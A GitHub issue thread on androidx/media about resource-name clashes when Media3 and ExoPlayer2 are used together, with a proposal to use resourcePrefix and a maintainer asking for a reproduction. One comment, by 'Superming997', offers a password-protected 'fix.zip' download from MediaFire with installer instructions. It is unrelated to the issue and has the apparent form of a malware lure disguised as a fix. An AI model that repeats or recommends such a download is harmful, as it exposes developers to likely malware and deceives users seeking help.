### ISSUE TITLE
Add resource prefix for resources

### ISSUE THREAD

**Issue by harshit23897** [androidx/media#1654]
### [REQUIRED] Use case description
We are trying to add dependency on Androidx Media3 and we already have ExoPlayer2. When we are trying to build the app with both Androidx Media3 and ExoPlayer2, app is not building as there is clash is names of resources. Both Androidx Media3 and ExoPlayer2 defines resources with same name and hence the clash happens.

### Proposed solution
Allow library users to add a unique prefix for all resources or add a static prefix in front of all resources. [resourcePrefix](https://developer.android.com/reference/tools/gradle-api/8.2/com/android/build/api/dsl/CommonExtension#resourcePrefix()) can be used for this

### Alternatives considered
I am not aware of any alternatives.

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tonihei** [comment]
I tried building an app with both media3 and exoplayer2 dependencies including using a resource drawable, but couldn't see any issue. Can you share about your setup or provide a minimal example project that highlights the issue?
